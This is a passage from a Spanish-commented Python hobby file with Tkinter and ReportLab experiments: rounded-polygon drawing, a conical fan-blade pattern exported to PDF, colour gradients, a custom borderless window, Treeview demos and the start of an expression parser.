punto1=(xplace,yplace+r)
centroX=xplace+r
centroY=yplace+r
for g in range(180,90,-1):
rad=math.radians(float(g))
punto1+=(centroX+math.cos(rad)*r,centroY-math.sin(rad)*r)
punto1+=(xplace+r,yplace)
else:
punto1=(xplace,yplace)
if r>0:
punto2=(xplace+ancho-r,yplace)
centroX=xplace+ancho-r
centroY=yplace+r
for g in range(90,0,-1):
rad=math.radians(float(g))
punto2+=(centroX+math.cos(rad)*r,centroY-math.sin(rad)*r)
punto2+=(xplace+ancho,yplace+r)
else:
punto2=(xplace+ancho,yplace)
if r>0:
punto3=(xplace+ancho,yplace+alto-r)
centroX=xplace+ancho-r
centroY=yplace+alto-r
for g in range(0,-90,-1):
rad=math.radians(float(g))
punto3+=(centroX+math.cos(rad)*r,centroY-math.sin(rad)*r)
punto3+=(xplace+ancho-r,yplace+alto)
else:
punto3=(xplace+ancho,yplace+alto)
if r>0:
punto4=(xplace+r,yplace+alto)
centroX=xplace+r
centroY=yplace+alto-r
for g in range(-90,-180,-1):
rad=math.radians(float(g))
punto4+=(centroX+math.cos(rad)*r,centroY-math.sin(rad)*r)
punto4+=(xplace,yplace+alto-r)
else:
punto4=(xplace,yplace+alto)
puntos=punto1+punto2+punto3+punto4
cu.create_polygon(puntos,fill=fill,outline=outline)
if text and (len(text)*7):
cu.create_text(xplace+int(ancho/2), yplace+int(alto/2),fill=fontColor,font=(fontType,fontSize), text=str(text))
cu.create_text(alcance+10, yplace+int(alto/2),fill=fontColor,font=(fontType,fontSize), text=str(len(text))+' , '+str(ancho)+' , '+str(float(ancho)/float(len(text)))[0:5])
def aspas(x=10,y=10,dividir=120,baseRadio=100.0,altura=100.0,revolucion=360,rotorRadio=5.0,fondo=60):
geo=geometria()
xR=[0.0]
yR=[rotorRadio]
zR=[-1*(fondo/baseRadio)*(baseRadio-rotorRadio)]
xA=[0.0]
yA=[baseRadio]
zA=[0.0]
tanA=baseRadio/altura
for ang in range(1,revolucion,1):
if (((altura-((altura/float(revolucion))*float(ang)))*tanA) >= rotorRadio):
rad=math.radians(float(ang))
zA.append((altura/float(revolucion))*float(ang))
p=((altura-zA[-1])*tanA)
yA.append(p*math.cos(rad))
xA.append(p*math.sin(rad))
zR.append((-1*(((fondo+zA[-1])/p)*(p-rotorRadio))+zA[-1]))
yR.append((rotorRadio)*math.cos(rad))
xR.append((rotorRadio)*math.sin(rad))
fin=ang
xOut=[0]
yOut=[geo.dis([xR[0],yR[0],zR[0]],[xA[0],yA[0],zA[0]])]
xIn =[0]
yIn =[0]
for n in range(1,fin+1,1):
A=[xA[n-1],yA[n-1],zA[n-1]] #punto que ya esta en el plano
B=[xR[n-1],yR[n-1],zR[n-1]] #punto origen que ya esta en plano
C=[xA[n],yA[n],zA[n]] #punto que se agregara al plano
xO=geo.dis(geo.alt(C,A,B),C)
yO=geo.dis(geo.alt(C,A,B),B)
#print(math.degrees(angRad([0,1,0],resta([xIn[-1],yIn[-1],0],[xOut[-1],yOut[-1],0]))))
rot= -1*math.fabs(geo.angRad([0,1,0],geo.resta([xIn[-1],yIn[-1],0],[xOut[-1],yOut[-1],0])))
xRot, yRot=geo.rotar(rot,[xO,yO,0])
xTras, yTras=geo.trasladar([xIn[-1],yIn[-1],0],[xRot,yRot,0])
yOut.append(yTras)
xOut.append(xTras)
A=[xA[n],yA[n],zA[n]]
B=[xR[n-1],yR[n-1],zR[n-1]]
C=[xR[n],yR[n],zR[n]]
xO= geo.dis(geo.alt(C,A,B),C)
yO= geo.dis(geo.alt(C,A,B),B) if geo.dis(geo.alt(C,A,B),A)<geo.dis(A,B) else geo.dis(geo.alt(C,A,B),B)*(-1)
rot= -1*math.fabs(geo.angRad([0,1,0],geo.resta([xIn[-1],yIn[-1],0],[xOut[-1],yOut[-1],0])))
xRot, yRot=geo.rotar(rot,[xO,yO,0])
xTras, yTras=geo.trasladar([xIn[-1],yIn[-1],0],[xRot,yRot,0])
yIn.append(yTras)
xIn.append(xTras)
angulo = [(n, xOut[n]+(x), yOut[n]+(y), xIn[n]+(x), yIn[n]+(y), zR[n]+fondo) for n in range(0,len(xOut),dividir)]+[(fin, xOut[fin]+(x), yOut[fin]+(y), xIn[fin]+(x), yIn[fin]+(y), zR[fin]+fondo)]
poligono = [(xOut[n]+(x),yOut[n]+(y)) for n in range(0,len(xOut),1)]+[(xIn[n]+(x),yIn[n]+(y)) for n in range(len(xIn)-1,-1,-1)]+[(xOut[0]+x,yOut[0]+y)]
return poligono, angulo, fin
def penciltip(debug=1):
from reportlab.lib.colors import tan, black, green
from reportlab.lib.units import mm
from reportlab.pdfgen import canvas
canvas = canvas.Canvas("plano.pdf", pagesize=letter)
canvas.setLineWidth(.3)
canvas.setFont('Helvetica', 8)
baseRadio=100.0
profundidad=60.0
angulos=120
altura=100.0
revolucion=360
rotorRadio=5.0
puntos,angulo,fin = aspas(x=10,y=int((780-(geometria().hypotenusa(baseRadio,profundidad)*mm))/mm),dividir=angulos,baseRadio=baseRadio,altura=altura,revolucion=revolucion,rotorRadio=rotorRadio,fondo=profundidad)
#canvas.line(480,747,580,747)
canvas.drawString(10,70,'Plano: ')
canvas.drawString(10,60,'Giro real: '+str(fin)+" grados")
canvas.drawString(10,50,'Radio Base: '+str(baseRadio)+" mm")
canvas.drawString(10,40,'Radio Rotor: '+str(rotorRadio)+" mm")
canvas.drawString(10,30,'Fondo: '+str(profundidad)+" mm")
canvas.drawString(10,20,'Altura: '+str(altura)+" mm")
canvas.drawString(10,10,'Giro Especulado: '+str(revolucion)+" grados")
canvas.setLineWidth(3)
canvas.drawString(10.0*mm,780,'100mm')
canvas.line(10.0*mm, 780, 110.0*mm, 780)
canvas.line(5.0*mm, 250*mm, 5.0*mm, 150*mm)
canvas.setLineWidth(.3)
for g in range(0,len(puntos)-1,1):
canvas.line(puntos[g][0]*mm, puntos[g][1]*mm, puntos[g+1][0]*mm, puntos[g+1][1]*mm)
canvas.setLineWidth(3)
for g in range(0,len(angulo),1):
canvas.line(angulo[g][1]*mm, angulo[g][2]*mm, angulo[g][3]*mm, angulo[g][4]*mm)
canvas.drawString(angulo[g][1]*mm+((angulo[g][1]*mm-angulo[g][3]*mm)/100), angulo[g][2]*mm+((angulo[g][2]*mm-angulo[g][4]*mm)/100),'_'+str(angulo[g][0])+'grados, altura: '+str( str(angulo[g][5]) if (6 > len(str(angulo[g][5]))) else str(angulo[g][5])[:5] )+'mm')
#canvas.drawString(puntos[int((len(puntos)-2)/2)][0]*mm, puntos[int((len(puntos)-2)/2)][1]*mm,'_'+str(int((len(puntos)-1)/2))+'grados')
canvas.save()
print("Ok")
#penciltip()
def escalarHex(h="#ffffff",factor=1.0):
escala={'0':0,'1':1,'2':2,'3':3,'4':4,'5':5,'6':6,'7':7,'8':8,'9':9,'a':10,'b':11,'c':12,'d':13,'e':14,'f':15}
RR=int(float((escala[h[1:3][0]])*16+(escala[h[1:3][1]]))*factor)
GG=int(float((escala[h[3:5][0]])*16+(escala[h[3:5][1]]))*factor)
BB=int(float((escala[h[5:][0]])*16+(escala[h[5:][1]]))*factor)
#print(str(hex(RR)),str(hex(GG)),str(hex(BB)))
ret='#'+("" if RR>15 else "0")+str(hex(RR))[2:]+("" if GG>15 else "0")+str(hex(GG))[2:]+("" if BB>15 else "0")+str(hex(BB))[2:]
#print(RR,GG,BB,ret[0:7])
return ret[0:7]
import builtins
global correo,cu,labelcrono,raiz,textos,correoVar,ciVar,totalVar,timbreVar,v
def caja():
#print(dir(memoryview.tobytes))
#print(dir(globals))
#print(dir(builtins))
def len_string(string,fontType='Arial',fontSize=11):
longitud={
'Arial':{
'A':9.0,'a':8.0,'b':8.0,'c':8.0,'d':8.0,'e':8.0,'f':4.0,
'g':8.0,'h':8.0,'i':3.0,'j':3.0,'k':7.0,'l':3.0,'m':13.0,
'n':8.0,'ñ':8.0,'o':8.0,'p':8.0,'q':8.0,'r':5.0,'s':8.0,
't':4.0,'u':8.0,'v':7.0,'w':11.0,'x':7.0,'y':7.0,'z':8.0,
'.':4.0,'B':10.0,'C':11.0,'D':11.0,'E':10.0,'F':9.0,'G':11.0,
'H':10.0,'I':3.0,'J':7.0,'K':10.0,'L':8.0,'M':11.0,'N':10.0,
'Ñ':10.0,'O':12.0,'P':10.0,'Q':12.0,'R':11.0,'S':10.0,'T':9.0,
'U':10.0,'V':9.0,'W':15,'X':9.0,'Y':9.0,'Z':8.0,'0':8.0,
'1':8.0,'2':8.0,'3':8.0,'4':8.0,'5':8.0,'6':8.0,'7':8.0,'8':8.0,'9':8.0
}
}
l=0.0
for c in string:
if c in longitud[fontType]:
l+=longitud[fontType][c]
else:
l += 8.0
return l
global correo,cu,labelcrono,raiz,textos,correoVar,ciVar,totalVar,timbreVar,widgets,v
def validar(name,valido,*arg):
#print(*arg)
# 'highlightbackground' parametro para el color del borde cuando no esta enfocado
# 'highlightcolor' color del entry couando esta enfocado
# 'highlightthickness' grosol del borde
if name in v:
ret=v[name].get()
#print(ret)
if valido=="correo" and ret:
if "@" in ret and (ret.split('@')[-1] in ['gmail.com','es','edu']):
widgets[name].config(highlightbackground='green', highlightcolor= "green",highlightthickness=2)
else:
widgets[name].config(highlightbackground='red', highlightcolor= "red",highlightthickness=5)
def dibujar(v,alto=800,ancho=650):
polig(0,0,ancho,alto,radio=5,fill='#ff0000',outline='#ff00f0')
fontType=v['fontType'].get()
fontSize=v['fontSize'].get()
repeticiones=v['repeticiones'].get()
letra=v['letra'].get()
desde=v['desde'].get()
hasta=v['hasta'].get()
pasos=v['pasos'].get()
ySuma=200
for x in range(desde,hasta,pasos):
#polig(50,ySuma,int(strPixel("abc defg_hijklmnñopqrstuvwxyz....."[0:x])),20,radio=5,text=str("abc defg_hijklmnñopqrstuvwxyz.....")[0:x])
polig(50,ySuma,x,20,radio=5,text=letra*repeticiones,fontSize=fontSize,fontType=fontType,fill='#0f0f0f',outline='#010101',alcance=int(ancho*0.8))
#circulin(radio=10,Cx=25,Cy=ySuma,grado0=0,gradoF=int(360/(34-x)))
ySuma += 30
miFrameinicio.configure(width = ancho, height=ySuma+100)
cu.configure(width = ancho, height=ySuma+100)
raiz.update()
def dibujarExacta(v,alto=800,ancho=650):
polig(0,0,ancho,alto,radio=5,fill='#ff0000',outline='#ff00f0')
fontType=v['fontType'].get()
fontSize=v['fontSize'].get()
repeticiones=v['repeticiones'].get()
letra=v['letra'].get()
desde=v['desde'].get()
hasta=v['hasta'].get()
pasos=v['pasos'].get()
ySuma=200
for x in range(desde,hasta,pasos):
#polig(50,ySuma,int(strPixel("abc defg_hijklmnñopqrstuvwxyz....."[0:x])),20,radio=5,text=str("abc defg_hijklmnñopqrstuvwxyz.....")[0:x])
polig(50,ySuma,x,20,radio=5,text=letra*repeticiones,fontSize=fontSize,fontType=fontType,fill='#0f0f0f',outline='#010101',alcance=int(ancho*0.8))
#circulin(radio=10,Cx=25,Cy=ySuma,grado0=0,gradoF=int(360/(34-x)))
ySuma += 30
miFrameinicio.configure(width = ancho, height=ySuma+100)
cu.configure(width = ancho, height=ySuma+100)
raiz.update()
widgets={}
v={}
label={}
raiz=Tk()
raiz.title("El Mejor Cajero del Mundo")
scrollbar=Scrollbar(raiz)
c = Canvas(raiz, yscrollcommand=scrollbar.set)
scrollbar.config(command=c.yview)
scrollbar.pack(side=RIGHT, fill=Y)
miFrameinicio=Frame(c)
miFrameinicio.configure(width = ancho, height=largo)
cu=Canvas(miFrameinicio, width=ancho, height=largo, background=fondor)
cu.place(x=-1, y=-1)
c.pack(side="left" , fill="both", expand=True)
c.create_window(0,0,window=miFrameinicio, anchor='nw')
c.config(scrollregion=c.bbox("all"))
v['fontType']=StringVar(value=str('Arial'))
v['letra']=StringVar(value=str('a'))
v['fontSize']=IntVar(value=11)
v['desde']=IntVar(value=50)
v['hasta']=IntVar(value=100)
v['pasos']=IntVar(value=5)
v['repeticiones']=IntVar(value=20)
#Separator(self.raiz, orient=HORIZONTAL)
label['fontSize']=Label(miFrameinicio, text='fontSize',fg=fondor,bg=fondo,font=("Arial",10),bd=0,justify="left",anchor=E)
label['fontSize'].place(x=10, y=10)
widgets['fontSize']=Entry(miFrameinicio,textvariable=v['fontSize'])
widgets['fontSize'].place(x=10, y=45)
label['fontType']=Label(miFrameinicio, text='fontType',fg=fondor,bg=fondo,font=("Arial",10),bd=0,justify="left",anchor=E)
label['fontType'].place(x=150, y=10)
widgets['fontType']=Entry(miFrameinicio,textvariable=v['fontType'])
widgets['fontType'].place(x=150, y=45)
label['letra']=Label(miFrameinicio, text='letra',fg=fondor,bg=fondo,font=("Arial",10),bd=0,justify="left",anchor=E)
label['letra'].place(x=290, y=10)
widgets['letra']=Entry(miFrameinicio,textvariable=v['letra'])
widgets['letra'].place(x=290, y=45)
label['desde']=Label(miFrameinicio, text='desde',fg=fondor,bg=fondo,font=("Arial",10),bd=0,justify="left",anchor=E)
label['desde'].place(x=10, y=65)
widgets['desde']=Entry(miFrameinicio,textvariable=v['desde']).place(x=10, y=100)
label['hasta']=Label(miFrameinicio, text='hasta',fg=fondor,bg=fondo,font=("Arial",10),bd=0,justify="left",anchor=E)
label['hasta'].place(x=150, y=65)
widgets['hasta']=Entry(miFrameinicio,textvariable=v['hasta'])
widgets['hasta'].place(x=150, y=100)
label['pasos']=Label(miFrameinicio, text='pasos',fg=fondor,bg=fondo,font=("Arial",10),bd=0,justify="left",anchor=E)
label['pasos'].place(x=290, y=65)
widgets['pasos']=Entry(miFrameinicio,textvariable=v['pasos'])
widgets['pasos'].place(x=290, y=100)
label['repeticiones']=Label(miFrameinicio, text='repeticiones',fg=fondor,bg=fondo,font=("Arial",10),bd=0,justify="left",anchor=E)
label['repeticiones'].place(x=10, y=120)
widgets['repeticiones']=Entry(miFrameinicio,textvariable=v['repeticiones'])
widgets['repeticiones'].place(x=10, y=155)
widgets['boton']=Button(miFrameinicio,text='Dibujar',command=lambda: dibujar(v),width=5,bg='#2e2e2e').place(x=150,y=155)
raiz.geometry(str(ancho)+"x"+str(alto)+"+10+10")
raiz.update()
c.config(scrollregion=c.bbox("all"))
#print(foco)
#threading.Thread(target=crono).start()
raiz.mainloop()
def totalScroll():
from myVars import inputsDefault
from tkinter import ttk
root=Tk()
#root.wm_attributes('-alpha',0.5)
# with Windows OS
root.bind("<MouseWheel>",lambda event: canvas.yview_scroll(int(-1*(event.delta/120)), "units"))
root.bind("<Destroy>",lambda event: print('<Destroy>') )
#root.bind("<Leave>",lambda event: print('<Leave>') )
root.bind("<Map>",lambda event: print(event) )
root.bind("<Expose>",lambda event: print(event) )
#root.bind("<13>",lambda event: print('<GraphicsExpose>',event) )
#root.bind("<NoExpose>",lambda event: print('<NoExpose>') )
root.bind("<Visibility>",lambda event: print(event) )
#root.bind("<UnMap>",lambda event: print('<UnMap>') )
root.bind("<MapRequest>",lambda event: print('<MapRequest>') )
root.bind("<Reparent>",lambda event: print('<Reparent>') )
#root.bind("<Selection>",lambda event: print('<Selection>') )
#root.bind("<Mapping>",lambda event: print('<Mapping>') )
root.bind("<Activate>",lambda event: print('<Activate>') )
root.bind("<Deactivate>",lambda event: print('<Deactivate>') )
#root.bind("<SelectionClear>",lambda event: print('<SelectionClear>') )
root.bind("<FocusIn>",lambda event: print(event) )
root.bind("<FocusOut>",lambda event: print('<FocusOut>') )
root.bind("<Gravity>",lambda event: print('<Gravity>') )
#root.bind("<Keymap>",lambda event: print('<Keymap>') )
root.bind("<Create>",lambda event: print('<Create>') )
root.bind("<Circulate>",lambda event: print('<Circulate>') )
#root.bind("<>",lambda event: print('<>') )
root.bind("<Property>",lambda event: print('<Property>') )
root.bind("<Configure>",lambda event: print(event) )
# with Linux OS
#root.bind("<Button-4>",MouseWheelHandler)
#root.bind("<Button-5>",MouseWheelHandler)
f = Frame(root)
width = height = 100
canvas=Canvas(f)
yscrollbar = Scrollbar(f, orient='vertical',command=canvas.yview)
xscrollbar = Scrollbar(f, orient='horizontal',command=canvas.xview)
frame=Frame(canvas)
print(canvas.bbox("all"))
frame.bind("<Configure>",lambda e: canvas.configure(scrollregion=canvas.bbox("all")))
canvas.create_window((0, 0), window=frame, anchor="nw")#esta linea equivale a: frame.pack(in_=canvas,anchor="nw")
canvas.configure(xscrollcommand=xscrollbar.set,yscrollcommand=yscrollbar.set)
yscrollbar.pack(side='right', fill='y')
xscrollbar.pack(side='bottom', fill='x')
f.pack(expand=1, fill='both')
canvas.pack(side='left', fill='both', expand=1)
for x in range(10):
Label(frame, text='Prueba Label '+str('@'*(x+1)),bg='#f0f0f0').pack()
tree = ttk.Treeview(frame,columns=tuple('#'+str(c+1) for c in range(len(inputsDefault['help']))))
tree.pack()
tree.heading("#0", text="ID")
num=['#'+str(c+1) for c in range(len(inputsDefault['help']))]
count=0
for c in inputsDefault['help']:
print(str(c))
tree.heading(str(num[count]), text=c,width=50)
count += 1
#
count=0
for c in inputsDefault:
#inputsDefault[c]['id']=count
if inputsDefault[c]:
tree.insert("", END, text=count,
values=tuple(inputsDefault[c][h] for h in inputsDefault[c]))
count += 1
root.update()
root.mainloop()
def canvasGradient(padre,color1,color2):
escala={'0':0,'1':1,'2':2,'3':3,'4':4,'5':5,'6':6,'7':7,'8':8,'9':9,'a':10,'b':11,'c':12,'d':13,'e':14,'f':15}
r1=float((escala[color1[1:3][0]])*16+(escala[color1[1:3][1]]))
g1=float((escala[color1[3:5][0]])*16+(escala[color1[3:5][1]]))
b1=float((escala[color1[5:][0]])*16+(escala[color1[5:][1]]))
r2=float((escala[color2[1:3][0]])*16+(escala[color2[1:3][1]]))
g2=float((escala[color2[3:5][0]])*16+(escala[color2[3:5][1]]))
b2=float((escala[color2[5:][0]])*16+(escala[color2[5:][1]]))
height=padre.winfo_height()
width=padre.winfo_width()
c=Canvas(padre,height=padre.winfo_height(),width=padre.winfo_width())
print((c,height,width,color1,color2))
r=(r2-r1)/width
g=(g2-g1)/width
b=(b2-b1)/width
for i in range(width):
RR=int(r1+(r*i))
GG=int(g1+(g*i))
BB=int(b1+(b*i))
color='#'+("" if RR>15 else "0")+str(hex(RR))[2:]+("" if GG>15 else "0")+str(hex(GG))[2:]+("" if BB>15 else "0")+str(hex(BB))[2:]
c.create_line(i,0,i,width,fill=color)
#,tags=("gradient",)
return c
def Gradient(padre,color1,color2):
escala={'0':0,'1':1,'2':2,'3':3,'4':4,'5':5,'6':6,'7':7,'8':8,'9':9,'a':10,'b':11,'c':12,'d':13,'e':14,'f':15}
r1=float((escala[color1[1:3][0]])*16+(escala[color1[1:3][1]]))
g1=float((escala[color1[3:5][0]])*16+(escala[color1[3:5][1]]))
b1=float((escala[color1[5:][0]])*16+(escala[color1[5:][1]]))
r2=float((escala[color2[1:3][0]])*16+(escala[color2[1:3][1]]))
g2=float((escala[color2[3:5][0]])*16+(escala[color2[3:5][1]]))
b2=float((escala[color2[5:][0]])*16+(escala[color2[5:][1]]))
height=padre.winfo_height()
width=padre.winfo_width()
r=(r2-r1)/width
g=(g2-g1)/width
b=(b2-b1)/width
lines=[]
for i in range(width):
RR=int(r1+(r*i))
GG=int(g1+(g*i))
BB=int(b1+(b*i))
color='#'+("" if RR>15 else "0")+str(hex(RR))[2:]+("" if GG>15 else "0")+str(hex(GG))[2:]+("" if BB>15 else "0")+str(hex(BB))[2:]
lines +=[[i,0,i,height,color]]
#,tags=("gradient",)
return lines
def ventanaPersonalizada():
global myX, myY,rootX,rootY,myFoco,fullalto,fullancho,ancho,alto
myX=10
myY=10
rootX=10
rootY=10
ancho=500
alto=300
global lapsoRoot,lapsoOculto
lapsoRoot=time.time()
lapsoOculto=time.time()
def expandir(v):
global fullalto,fullancho,ancho,alto
if v:
btnMax.config(command=lambda:expandir(0))
oculto.geometry('{0}x{1}+0+0'.format(10,10))
root.geometry('{0}x{1}+0+0'.format(fullancho,fullalto-50))
root.update()
else:
btnMax.config(command=lambda:expandir(1))
oculto.geometry('{0}x{1}+0+0'.format(10,10))
root.geometry('{0}x{1}+0+0'.format(ancho,alto))
root.update()
def select(w='force',event=''):
global myFoco,lapsoRoot
if event=='':
return 'Null'
elif event=='FocusIn' and w=='oculto':
myFoco.set('otro')
lapsoRoot=time.time()+0.01
t='FocusIn'
else:
t=str(event.type)
if w=='root' and "FocusIn" in t :
myFoco.set('root')
if w=='root' and "FocusOut" in t :
myFoco.set('otro')
lapsoRoot=time.time()
if w=='oculto' and "FocusIn" in t:
root.focus_force()
myFoco.set('oculto')
lapsoOculto=time.time()
if w=='oculto' and "FocusOut" in t:
myFoco.set('otro')
if (time.time()-lapsoRoot)<0.50 and myFoco.get()=='oculto':
root.withdraw()
oculto.iconify()
print('Min')
elif (time.time()-lapsoRoot)>0.50 and myFoco.get()=='otro':
root.deiconify()
oculto.geometry('+{0}+{1}'.format(root.geometry().split('+')[1],root.geometry().split('+')[2]))
root.focus_force()
print('Max')
print(myFoco.get())
def radar(event):
#print(str(event.state))
if '8' in str(event.state):
x=event.x_root-int(root.geometry().split('+')[1])
y=event.y_root-int(root.geometry().split('+')[2])
n=s=e=o=0
if (root.winfo_height()-y)<10:
s=1
if (root.winfo_width()-x)<10:
e=1
if (y)<10:
n=1
if (x)<10:
o=1
#print(x,y,n,s,e,o)
def move_window(event):
global myX, myY,rootX,rootY
if event.widget==tituloCanvas and "ButtonPress" in str(event.type) :
myX=event.x_root
myY=event.y_root
if event.widget==tituloCanvas and "Motion" in str(event.type) :
#print(event)
x=event.x_root-int(root.geometry().split('+')[1])
y=event.y_root-int(root.geometry().split('+')[2])
if ((y-myY)!=0 or (x-myX)!=0):
#root.geometry('+{0}+{1}'.format(int(event.x_root-x),int(event.y_root-y)))
oculto.geometry('+{0}+{1}'.format(int(event.x_root-x)+int(event.x_root-myX)+10,int(event.y_root-y)+int(event.y_root-myY)+10))
root.geometry('+{0}+{1}'.format(int(event.x_root-x)+int(event.x_root-myX),int(event.y_root-y)+int(event.y_root-myY)))
myX=event.x_root
myY=event.y_root
#root.focus()
oculto=Tk()
oculto.iconify()
myFoco=StringVar(value=str('root'))
#myFoco.trace('w',lambda name,arg,mod :print(myFoco.get()))
oculto.bind("<Destroy>",lambda event :root.destroy())
oculto.bind("<FocusOut>",lambda e :select('oculto',event=e) )
oculto.bind("<FocusIn>",lambda e :select('oculto',event=e) )
#oculto.bind("<FocusOut>",lambda event :print("FocusOut Oculto") )
#oculto.bind("<Configure>",lambda event :print("Configure Oculto") )
oculto.geometry(str(10)+"x"+str(10)+"+10+10")
root=Tk()
root.bind("<Destroy>",lambda e :oculto.destroy() if oculto else print('Listo') )
root.bind("<FocusOut>",lambda e :select('root',event=e) )
root.bind("<FocusIn>",lambda e :select('root',event=e) )
root.overrideredirect(True)
root.geometry(str(ancho)+"x"+str(alto)+"+10+10")
titulo=Frame(root,relief='flat',bd=0)
titulo.pack(expand=1,side='top', fill='x')
btnSalir=Button(titulo,text='X',command=lambda:root.destroy(),width=5,bg='#2e2e2e',padx=2,pady=2,activebackground='red',bd=0,font='bold',fg='#ffffff',highlightthickness=0)
btnMax=Button(titulo,text='+',command=lambda:expandir(1),width=5,bg='#2e2e2e',padx=2,pady=2,activebackground='blue',bd=0,font='bold',fg='#ffffff',highlightthickness=0)
btnMin=Button(titulo,text='-',command=lambda:select('oculto',event='FocusIn'),width=5,bg='#2e2e2e',padx=2,pady=2,activebackground='white',bd=0,font='bold',fg='#ffffff',highlightthickness=0)
btnSalir.pack(side='right')
btnMax.pack(side='right')
btnMin.pack(side='right')
btnSalir.bind("<Leave>",lambda event :event.widget.config(bg='#2e2e2e'))#color cuando el mouse no esta por ensima de este Widget
btnSalir.bind("<Enter>",lambda event :event.widget.config(bg='#891010'))#color cuando el mouse Si esta por ensima de este Widget
btnMax.bind("<Leave>",lambda event :event.widget.config(bg='#2e2e2e'))#color cuando el mouse no esta por ensima de este Widget
btnMax.bind("<Enter>",lambda event :event.widget.config(bg='#891010'))#color cuando el mouse Si esta por ensima de este Widget
btnMin.bind("<Leave>",lambda event :event.widget.config(bg='#2e2e2e'))#color cuando el mouse no esta por ensima de este Widget
btnMin.bind("<Enter>",lambda event :event.widget.config(bg='#891010'))#color cuando el mouse Si esta por ensima de este Widget
root.bind("<B1-Motion>",move_window)#move_window(even)
root.bind("<Motion>",radar)
root.bind("<MouseWheel>",lambda event: canvas.yview_scroll(int(-1*(event.delta/120)), "units"))
# with Linux OS
#root.bind("<Button-4>",MouseWheelHandler)
#root.bind("<Button-5>",MouseWheelHandler)
f = Frame(root,relief='flat',bd=0,highlightthickness=0)
canvas=Canvas(f,bd=0,highlightthickness=0)
yscrollbar = Scrollbar(f, orient='vertical',command=canvas.yview,bd=0,highlightthickness=0)
xscrollbar = Scrollbar(f, orient='horizontal',command=canvas.xview,bd=0,highlightthickness=0)
frame=Frame(canvas,bd=0,highlightthickness=0)
frame.bind("<Configure>",lambda e: canvas.configure(scrollregion=canvas.bbox("all")))
canvas.create_window((0, 0), window=frame, anchor="nw")#esta linea equivale a: frame.pack(in_=canvas,anchor="nw")
canvas.configure(xscrollcommand=xscrollbar.set,yscrollcommand=yscrollbar.set)
yscrollbar.pack(side='right', fill='y')
xscrollbar.pack(side='bottom', fill='x')
f.pack(side='bottom', fill='x', expand=1)
canvas.pack(side='left', fill='both', expand=1)
raiz=Canvas(frame,bd=0,highlightthickness=0)
raiz.pack(in_=frame,fill='both',expand=1)
for x in range(100):
Label(raiz, text='Prueba Label '+str('@'*(x+1)),bg='#f0f0f0').pack()
root.update()
print(frame.winfo_width())
for line in Gradient(raiz,'#0f0000','#ff0f0f'):
print(line)
raiz.create_line(line[0],line[1],line[2],line[3],fill=line[4])
#tituloCanvas=Canvas(titulo,height=titulo.winfo_height(),width=titulo.winfo_width(),bg='#ff0000')
tituloCanvas=canvasGradient(titulo,'#ff0f0f','#0f0000')
tituloCanvas.config(bd=0,highlightthickness=0)
tituloCanvas.pack(in_=titulo)
tituloCanvas.bind("<Button>",move_window)
fullancho=root.winfo_screenwidth()
fullalto=root.winfo_screenheight()
root.focus_force()
#root.()
print('root.winfo_visual()',root.winfo_visual())
print('root.state()',root.state())
print('root.iconwindow()',root.iconwindow())
print('root.winfo_visual()',root.winfo_visual())
print('root.state()',root.state())
print('root.frame()',root.frame())
print('root.focusmodel()',root.focusmodel())
print('root.attributes()',root.attributes())
print('root.aspect()',root.aspect())
print('root.client()',root.client())
print('root.winfo_manager()',root.winfo_manager())
root.mainloop()
oculto.mainloop()
def pruebaTreeview():
from myVars import inputsDefault
from tkinter import ttk
window = Tk()
treeview = ttk.Treeview(window)
treeview.pack()
treeview.insert("", END, text="Elemento 1")
item = treeview.insert("", END, text="Elemento 2")
treeview.insert(item, END, text="Subelemento 2")
# Imprime los elementos del árbol.
print(treeview.get_children())
# Imprime los elementos dentro del Elemento 1.
print(treeview.get_children(item))
item1 = treeview.insert("", END, text="Elemento 1")
item2 = treeview.insert("", END, text="Elemento 2")
#Podemos mover el Elemento 1 dentro del Elemento 2 vía:
treeview.move(item1, item2, END)
# Elimina el elemento 2.
item1 = treeview.insert("", END, text="Elemento 1")
item2 = treeview.insert("", END, text="Elemento 2")
treeview.delete(item2)
# Desvincula el elemento 1.
treeview.detach(item1)
print(treeview.exists(item2)) # False.
print(treeview.exists(item1)) # True.
treeview.focus(item) # Pone el foco en item.
print(treeview.focus()) # Retorna el ID de item.
item1 = treeview.insert("", END, text="Elemento 1")
item2 = treeview.insert("", END, text="Elemento 2")
print(treeview.index(item1)) # 0
print(treeview.index(item2)) # 1
print(inputsDefault['help'])
print(tuple(c for c in inputsDefault['help'] if c!='id'))
tree = ttk.Treeview(window,columns=tuple('#'+str(c+1) for c in range(len(inputsDefault['help']))))
tree.pack()
tree.heading("#0", text="ID")
num=['#'+str(c+1) for c in range(len(inputsDefault['help']))]
count=0
for c in inputsDefault['help']:
print(str(c))
tree.heading(str(num[count]), text=c)
count += 1
#
count=0
for c in inputsDefault:
#inputsDefault[c]['id']=count
if inputsDefault[c]:
tree.insert("", END, text=count,
values=tuple(inputsDefault[c][h] for h in inputsDefault[c]))
count += 1
#tree.insert(inputsDefault[c]['id'],inputsDefault[c]['id'], inputsDefault[c]['id'])
#tree.insert("", END, text="README.txt",values=("850 bytes", "18:30"))
# Imprime {'lastmod': '18:30', 'size': '850 bytes'}.
print(tree.set(item))
window.mainloop()
def unicodeP(string='',variable='',desde=0,hasta=125):
listaunicode={}
mayuscula=[]
minuscula=[]
string=string.strip()
if ('(' in string[0]) and (')' in string[-1]):
string=string[1:-1]
string=string.strip()
for l in string:
if (97<=ord(l) and ord(l)<=122):
if not l in minuscula:
minuscula += [l]
if (65<=ord(l) and ord(l)<=90):
if not l in mayuscula:
mayuscula += [l]
p=[]
for x in range(desde,hasta,1):
p+=[[x,str(chr(int(x)))]]
print(p[-1])
print(p)
def strToMath(string='',variable='x',dy=0,p=0,c=None,decimales=4,signo=None,v=0,composicion=0):
if not v:
print('validando',string,composicion)
v=1
composicion += 1
nivel=0
esSuma=0
signoSuma=[0]
esProducto=0
signoProducto=[0]
esDivision=0
signoDivision=[0]
esExponente=0
signoExponente=[0]
esResto=0
signoResto=[0]
constantes={'e':math.e,'pi':3.1416,'g':9.8182}
operador=1
operadores=['w','sen','cos','tg','log','ln','lambert','dy','sec','cosec','cotag','arcsen','arccos','arctg','round','floor','ceil','signo','abs']
simbolos=['*','(',')','/','+','-','.','%']
monomio=1
parentesis=1
string=string.strip()
for x in range(0,len(string),1):
if string[x]=='(':
nivel += 1
if string[x]==')':
nivel -= 1
if string[x] in '-+' and nivel==0:
if x>0:
monomio=0
if string[x] in '-+*/%' and nivel==0:
if x>0:
parentesis=0
if monomio:
if string[0] in '+' and nivel==0:
sig= 1.0
string=string[1:]
elif string[0] in '-' and nivel==0:
sig=-1.0
